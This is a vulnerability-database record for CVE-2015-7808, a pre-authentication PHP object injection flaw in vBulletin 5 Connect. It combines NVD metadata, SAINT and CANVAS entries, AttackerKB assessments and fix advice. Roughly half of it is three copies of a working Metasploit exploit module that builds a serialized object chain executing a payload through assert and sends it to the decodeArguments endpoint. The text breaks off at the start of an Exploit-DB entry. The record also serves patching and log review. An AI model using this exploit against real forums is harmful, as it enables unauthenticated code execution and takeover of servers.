ID CVE-2015-7808
Type cve
Reporter cve@mitre.org
Modified 2015-11-25T20:23:00
Description
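The vB_Api_Hook::decodeArguments method in vBulletin 5 Connect 5.1.2 through 5.1.9 allows remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via a crafted serialized object in the arguments parameter to ajax/api/hook/decodeArguments. The CVSS v2 vector in this record (AV:N/AC:L/Au:N) means the endpoint is reachable over the network without authentication; the SAINT entries below give the fix as upgrading to vBulletin 5 Connect 5.1.10 or higher, or installing the appropriate patch. The record's CPE list also marks 5.0.0 through 5.1.1 as vulnerable, so the 5.1.2 lower bound in this description should not be used on its own to rule a host out; on hosts that ran any listed version, web-server logs with requests to ajax/api/hook/decodeArguments carrying an arguments parameter are worth reviewing.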
{"id": "CVE-2015-7808", "bulletinFamily": "NVD", "title": "CVE-2015-7808", "description": "The vB_Api_Hook::decodeArguments method in vBulletin 5 Connect 5.1.2 through 5.1.9 allows remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via a crafted serialized object in the arguments parameter to ajax/api/hook/decodeArguments.", "published": "2015-11-24T20:59:00", "modified": "2015-11-25T20:23:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7808", "reporter": "cve@mitre.org", "references": ["http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/", "http://packetstormsecurity.com/files/134331/vBulletin-5.1.2-Unserialize-Code-Execution.html", "http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq", "https://www.exploit-db.com/exploits/38629/", "https://blog.sucuri.net/2015/11/vbulletin-exploits-in-the-wild.html", "http://www.rapid7.com/db/modules/exploit/multi/http/vbulletin_unserialize"], "cvelist": ["CVE-2015-7808"], "type": "cve", "lastseen": "2020-10-03T12:49:56", "edition": 3, "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/VBULLETIN_UNSERIALIZE"]}, {"type": "exploitdb", "idList": ["EDB-ID:38790", "EDB-ID:38629", "EDB-ID:48761"]}, {"type": "canvas", "idList": ["VBULLETIN_PREAUTH_DECODEARGUMENTS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:134331"]}, {"type": "saint", "idList": ["SAINT:B7AA4103B637A73ADBA0CB33967A79E7", "SAINT:00E348107935D0067623F69C0236D85E", "SAINT:1F05E43F59AE9CD9BA586F676801FF36"]}, {"type": "attackerkb", "idList": ["AKB:1FCD3A14-757C-421D-8FD2-D0A1E947ECBE"]}, {"type": "zdt", "idList": ["1337DAY-ID-34855", "1337DAY-ID-24540"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105447"]}], "modified": "2020-10-03T12:49:56", "rev": 2}, "score": {"value": 8.9, "vector": "NONE", "modified": 
"2020-10-03T12:49:56", "rev": 2}, "vulnersScore": 8.9}, "cpe": ["cpe:/a:vbulletin:vbulletin:5.1.6", "cpe:/a:vbulletin:vbulletin:5.0.2", "cpe:/a:vbulletin:vbulletin:5.1.7", "cpe:/a:vbulletin:vbulletin:5.0.4", "cpe:/a:vbulletin:vbulletin:5.0.5", "cpe:/a:vbulletin:vbulletin:5.0.1", "cpe:/a:vbulletin:vbulletin:5.1.5", "cpe:/a:vbulletin:vbulletin:5.1.9", "cpe:/a:vbulletin:vbulletin:5.1.3", "cpe:/a:vbulletin:vbulletin:5.0.0", "cpe:/a:vbulletin:vbulletin:5.1.1", "cpe:/a:vbulletin:vbulletin:5.1.2", "cpe:/a:vbulletin:vbulletin:5.1.4", "cpe:/a:vbulletin:vbulletin:5.1.0", "cpe:/a:vbulletin:vbulletin:5.1.8", "cpe:/a:vbulletin:vbulletin:5.0.3"], "affectedSoftware": [{"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.1"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.0.4"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.0.1"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.2"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.2"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.2"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.2"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.4"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.0.5"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.9"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.0.3"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.3"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.3"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.6"}, 
{"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.0.2"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.5"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.8"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.0"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.0"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.1.7"}, {"cpeName": "vbulletin:vbulletin", "name": "vbulletin", "operator": "eq", "version": "5.0.0"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:vbulletin:vbulletin:5.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.1.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.1.2:beta1:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.1.2:rc2:*:*:*:*:*:*", 
"cpe:2.3:a:vbulletin:vbulletin:5.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.1.3:alpha5:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vbulletin:vbulletin:5.0.2:*:*:*:*:*:*:*"], "cwe": ["CWE-20"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.8:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.0:rc1:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.0.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.0.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.0.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.9:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.0.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.2:rc2:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.6:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.3:alpha5:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.7:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.2:rc1:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.0.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.2:beta1:*:*:*:*:*:*", 
"vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.1.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vbulletin:vbulletin:5.0.5:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}}
{"canvas": [{"lastseen": "2019-05-29T19:48:26", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7808"], "edition": 2, "description": "**Name**| vbulletin_preauth_decodeArguments \n---|--- \n**CVE**| CVE-2015-7808 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| vBulletin pre-auth remote code execution \n**Notes**| CVE Name: CVE-2015-7808 \nVENDOR: vBulletin Solutions \nNOTES: \n \nTested on Ubuntu 14.04 against: \n\\- vBulletin 5.1.4 \n\\- vBulletin 5.0.4 \n \nRepeatability: Infinite \nReferences: ['http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/', 'http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq'] \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7808 \n\n", "modified": "2015-11-24T20:59:00", "published": "2015-11-24T20:59:00", "id": "VBULLETIN_PREAUTH_DECODEARGUMENTS", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/vbulletin_preauth_decodeArguments", "title": "Immunity Canvas: VBULLETIN_PREAUTH_DECODEARGUMENTS", "type": "canvas", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "saint": [{"lastseen": "2016-10-03T15:02:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7808"], "description": "Added: 04/15/2016 \nCVE: [CVE-2015-7808](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7808>) \n\n\n### Background\n\nvBulletin is PHP software for building community websites. \n\n### Problem\n\nA vulnerability in vBulletin 5 Connect allows remote attackers to execute arbitrary PHP code by placing a specially crafted serialized object in the `**arguments**` parameter to the `**decodeArguments**` method. \n\n### Resolution\n\nUpgrade to vBulletin 5 Connect 5.1.10 or higher, or install the appropriate patch. 
\n\n### References\n\n<http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/> \n \n\n", "edition": 1, "modified": "2016-04-15T00:00:00", "published": "2016-04-15T00:00:00", "id": "SAINT:00E348107935D0067623F69C0236D85E", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/vbulletin_decodearguments", "type": "saint", "title": "vBulletin decodeArguments serialized object vulnerability", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-06-04T23:19:30", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7808"], "description": "Added: 04/15/2016 \nCVE: [CVE-2015-7808](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7808>) \n\n\n### Background\n\nvBulletin is PHP software for building community websites. \n\n### Problem\n\nA vulnerability in vBulletin 5 Connect allows remote attackers to execute arbitrary PHP code by placing a specially crafted serialized object in the `**arguments**` parameter to the `**decodeArguments**` method. \n\n### Resolution\n\nUpgrade to vBulletin 5 Connect 5.1.10 or higher, or install the appropriate patch. \n\n### References\n\n<http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/> \n \n\n", "edition": 4, "modified": "2016-04-15T00:00:00", "published": "2016-04-15T00:00:00", "id": "SAINT:B7AA4103B637A73ADBA0CB33967A79E7", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/vbulletin_decodearguments", "title": "vBulletin decodeArguments serialized object vulnerability", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T19:19:22", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7808"], "edition": 2, "description": "Added: 04/15/2016 \nCVE: [CVE-2015-7808](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7808>) \n\n\n### Background\n\nvBulletin is PHP software for building community websites. 
\n\n### Problem\n\nA vulnerability in vBulletin 5 Connect allows remote attackers to execute arbitrary PHP code by placing a specially crafted serialized object in the `**arguments**` parameter to the `**decodeArguments**` method. \n\n### Resolution\n\nUpgrade to vBulletin 5 Connect 5.1.10 or higher, or install the appropriate patch. \n\n### References\n\n<http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/> \n \n\n", "modified": "2016-04-15T00:00:00", "published": "2016-04-15T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/vbulletin_decodearguments", "id": "SAINT:1F05E43F59AE9CD9BA586F676801FF36", "type": "saint", "title": "vBulletin decodeArguments serialized object vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:32", "description": "", "published": "2015-11-13T00:00:00", "type": "packetstorm", "title": "vBulletin 5.1.2 Unserialize Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7808"], "modified": "2015-11-13T00:00:00", "id": "PACKETSTORM:134331", "href": "https://packetstormsecurity.com/files/134331/vBulletin-5.1.2-Unserialize-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'vBulletin 5.1.2 Unserialize Code Execution', \n'Description' => %q{ \nThis module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9 \n}, \n'Platform' => 'php', \n'License' => MSF_LICENSE, \n'Author' => [ \n'Netanel Rubin', # reported by \n'cutz', # original exploit \n'Julien (jvoisin) Voisin', # metasploit module \n], \n'Payload' => \n{ \n'BadChars' => \"\\x22\", \n}, 
\n'References' => \n[ \n['CVE', '2015-7808'], \n['EDB', '38629'], \n['URL', 'http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq'], \n['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/'] \n], \n'Arch' => ARCH_PHP, \n'Targets' => [ \n[ 'Automatic Targeting', { 'auto' => true } ], \n['vBulletin 5.0.X', {'chain' => 'vB_Database'}], \n['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}], \n], \n'DisclosureDate' => 'Nov 4 2015', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, \"The base path to the web application\", \"/\"]) \n], self.class) \nend \n \ndef check \nbegin \nres = send_request_cgi({ 'uri' => target_uri.path }) \nif (res && res.body.include?('vBulletin Solutions, Inc.')) \nif res.body.include?(\"Version 5.0\") \n@my_target = targets[1] if target['auto'] \nreturn Exploit::CheckCode::Appears \nelsif res.body.include?(\"Version 5.1\") \n@my_target = targets[2] if target['auto'] \nreturn Exploit::CheckCode::Appears \nelse \nreturn Exploit::CheckCode::Detected \nend \nend \nrescue ::Rex::ConnectionError \nreturn Exploit::CheckCode::Safe \nend \nend \n \ndef exploit \nprint_status(\"#{peer} - Trying to inferprint the instance...\") \n \n@my_target = target \ncheck_code = check \n \nunless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears \nfail_with(Failure::NoTarget, \"#{peer} - Failed to detect a vulnerable instance\") \nend \n \nif @my_target.nil? 
|| @my_target['auto'] \nfail_with(Failure::NoTarget, \"#{peer} - Failed to auto detect, try setting a manual target...\") \nend \n \nprint_status(\"#{peer} - Exploiting #{@my_target.name}...\") \n \nchain = 'O:12:\"vB_dB_Result\":2:{s:5:\"*db\";O:' \nchain << @my_target[\"chain\"].length.to_s \nchain << ':\"' \nchain << @my_target[\"chain\"] \nchain << '\":1:{s:9:\"functions\";a:1:{s:11:\"free_result\";s:6:\"assert\";}}s:12:\"*recordset\";s:' \nchain << \"#{payload.encoded.length}:\\\"#{payload.encoded}\\\";}\" \n \nchain = Rex::Text.uri_encode(chain) \nchain = chain.gsub(/%2a/, '%00%2a%00') # php and Rex disagree on '*' encoding \n \nsend_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'ajax/api/hook/decodeArguments'), \n'vars_get' => { \n'arguments' => chain \n}, \n'encode_params' => false, \n}) \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/134331/vbulletin_unserialize.rb.txt"}], "attackerkb": [{"lastseen": "2020-11-18T06:47:40", "bulletinFamily": "info", "cvelist": ["CVE-2015-7808"], "description": "The vB_Api_Hook::decodeArguments method in vBulletin 5 Connect 5.1.2 through 5.1.9 allows remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via a crafted serialized object in the arguments parameter to ajax/api/hook/decodeArguments.\n\n \n**Recent assessments:** \n \n**busterb** at September 24, 2019 10:04pm UTC reported:\n\nAs the world\u2019s most popular forum software, this is a big target, and that this vulnerability was an 0-day when it was first found is also extremely useful as an attacker. When exploited, the vulnerability allows an attacker to execute PHP code on any vBulletin server without requiring user authentication. 
It works with the default installation, meaning every vBulletin site was vulnerable at one point.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**wvu-r7** at September 24, 2019 10:10pm UTC reported:\n\nAs the world\u2019s most popular forum software, this is a big target, and that this vulnerability was an 0-day when it was first found is also extremely useful as an attacker. When exploited, the vulnerability allows an attacker to execute PHP code on any vBulletin server without requiring user authentication. It works with the default installation, meaning every vBulletin site was vulnerable at one point.\n", "modified": "2020-02-13T00:00:00", "published": "2015-11-24T00:00:00", "id": "AKB:1FCD3A14-757C-421D-8FD2-D0A1E947ECBE", "href": "https://attackerkb.com/topics/tN54WQX49M/vbulletin-5-connect-5-1-2-through-5-1-9-php-object-injection-attack", "type": "attackerkb", "title": "vBulletin 5 Connect 5.1.2 through 5.1.9 PHP object injection attack", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-01-08T13:17:40", "description": "This Metasploit module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9", "edition": 2, "published": "2015-11-14T00:00:00", "type": "zdt", "title": "vBulletin 5.1.2 Unserialize Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7808"], "modified": "2015-11-14T00:00:00", "id": "1337DAY-ID-24540", "href": "https://0day.today/exploit/description/24540", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'vBulletin 5.1.2 Unserialize Code Execution',\r\n 'Description' => %q{\r\n This module exploits a PHP object 
injection vulnerability in vBulletin 5.1.2 to 5.1.9\r\n },\r\n 'Platform' => 'php',\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Netanel Rubin', # reported by\r\n 'cutz', # original exploit\r\n 'Julien (jvoisin) Voisin', # metasploit module\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x22\",\r\n },\r\n 'References' =>\r\n [\r\n ['CVE', '2015-7808'],\r\n ['EDB', '38629'],\r\n ['URL', 'http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq'],\r\n ['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']\r\n ],\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' => [\r\n [ 'Automatic Targeting', { 'auto' => true } ],\r\n ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],\r\n ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],\r\n ],\r\n 'DisclosureDate' => 'Nov 4 2015',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"The base path to the web application\", \"/\"])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n begin\r\n res = send_request_cgi({ 'uri' => target_uri.path })\r\n if (res && res.body.include?('vBulletin Solutions, Inc.'))\r\n if res.body.include?(\"Version 5.0\")\r\n @my_target = targets[1] if target['auto']\r\n return Exploit::CheckCode::Appears\r\n elsif res.body.include?(\"Version 5.1\")\r\n @my_target = targets[2] if target['auto']\r\n return Exploit::CheckCode::Appears\r\n else\r\n return Exploit::CheckCode::Detected\r\n end\r\n end\r\n rescue ::Rex::ConnectionError\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n print_status(\"#{peer} - Trying to inferprint the instance...\")\r\n\r\n @my_target = target\r\n check_code = check\r\n\r\n unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears\r\n fail_with(Failure::NoTarget, \"#{peer} - Failed to detect a vulnerable instance\")\r\n end\r\n\r\n if @my_target.nil? 
|| @my_target['auto']\r\n fail_with(Failure::NoTarget, \"#{peer} - Failed to auto detect, try setting a manual target...\")\r\n end\r\n\r\n print_status(\"#{peer} - Exploiting #{@my_target.name}...\")\r\n\r\n chain = 'O:12:\"vB_dB_Result\":2:{s:5:\"*db\";O:'\r\n chain << @my_target[\"chain\"].length.to_s\r\n chain << ':\"'\r\n chain << @my_target[\"chain\"]\r\n chain << '\":1:{s:9:\"functions\";a:1:{s:11:\"free_result\";s:6:\"assert\";}}s:12:\"*recordset\";s:'\r\n chain << \"#{payload.encoded.length}:\\\"#{payload.encoded}\\\";}\"\r\n\r\n chain = Rex::Text.uri_encode(chain)\r\n chain = chain.gsub(/%2a/, '%00%2a%00') # php and Rex disagree on '*' encoding\r\n\r\n send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, 'ajax/api/hook/decodeArguments'),\r\n 'vars_get' => {\r\n 'arguments' => chain\r\n },\r\n 'encode_params' => false,\r\n })\r\n end\r\nend\n\n# 0day.today [2018-01-08] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/24540"}, {"lastseen": "2020-08-24T00:09:12", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2020-08-22T00:00:00", "title": "vBulletin 5.1.2 < 5.1.9 - Unserialize Code Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7808"], "modified": "2020-08-22T00:00:00", "id": "1337DAY-ID-34855", "href": "https://0day.today/exploit/description/34855", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'vBulletin 5.1.2 Unserialize Code Execution',\r\n 'Description' => %q{\r\n This module exploits a PHP object injection vulnerability in 
vBulletin 5.1.2 to 5.1.9\r\n },\r\n 'Platform' => 'php',\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Netanel Rubin', # reported by\r\n 'cutz', # original exploit\r\n 'Julien (jvoisin) Voisin', # metasploit module\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x22\",\r\n },\r\n 'References' =>\r\n [\r\n ['CVE', '2015-7808'],\r\n ['EDB', '38629'],\r\n ['URL', 'http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq'],\r\n ['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']\r\n ],\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' => [\r\n [ 'Automatic Targeting', { 'auto' => true } ],\r\n ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],\r\n ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],\r\n ],\r\n 'DisclosureDate' => 'Nov 4 2015',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"The base path to the web application\", \"/\"])\r\n ])\r\n end\r\n\r\n def check\r\n begin\r\n res = send_request_cgi({ 'uri' => target_uri.path })\r\n if (res && res.body.include?('vBulletin Solutions, Inc.'))\r\n if res.body.include?(\"Version 5.0\")\r\n @my_target = targets[1] if target['auto']\r\n return Exploit::CheckCode::Appears\r\n elsif res.body.include?(\"Version 5.1\")\r\n @my_target = targets[2] if target['auto']\r\n return Exploit::CheckCode::Appears\r\n else\r\n return Exploit::CheckCode::Detected\r\n end\r\n end\r\n rescue ::Rex::ConnectionError\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n print_status(\"Trying to inferprint the instance...\")\r\n\r\n @my_target = target\r\n check_code = check\r\n\r\n unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears\r\n fail_with(Failure::NoTarget, \"#{peer} - Failed to detect a vulnerable instance\")\r\n end\r\n\r\n if @my_target.nil? 
|| @my_target['auto']\r\n fail_with(Failure::NoTarget, \"#{peer} - Failed to auto detect, try setting a manual target...\")\r\n end\r\n\r\n print_status(\"Exploiting #{@my_target.name}...\")\r\n\r\n chain = 'O:12:\"vB_dB_Result\":2:{s:5:\"*db\";O:'\r\n chain << @my_target[\"chain\"].length.to_s\r\n chain << ':\"'\r\n chain << @my_target[\"chain\"]\r\n chain << '\":1:{s:9:\"functions\";a:1:{s:11:\"free_result\";s:6:\"assert\";}}s:12:\"*recordset\";s:'\r\n chain << \"#{payload.encoded.length}:\\\"#{payload.encoded}\\\";}\"\r\n\r\n chain = Rex::Text.uri_encode(chain)\r\n chain = chain.gsub(/%2a/, '%00%2a%00') # php and Rex disagree on '*' encoding\r\n\r\n send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, 'ajax/api/hook/decodeArguments'),\r\n 'vars_get' => {\r\n 'arguments' => chain\r\n },\r\n 'encode_params' => false,\r\n })\r\n end\r\nend\n\n# 0day.today [2020-08-23] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/34855"}], "exploitdb": [{"lastseen": "2016-02-04T08:51:47", "description": "vBulletin 5.x - Remote Code Execution Exploit. CVE-2015-7808. 
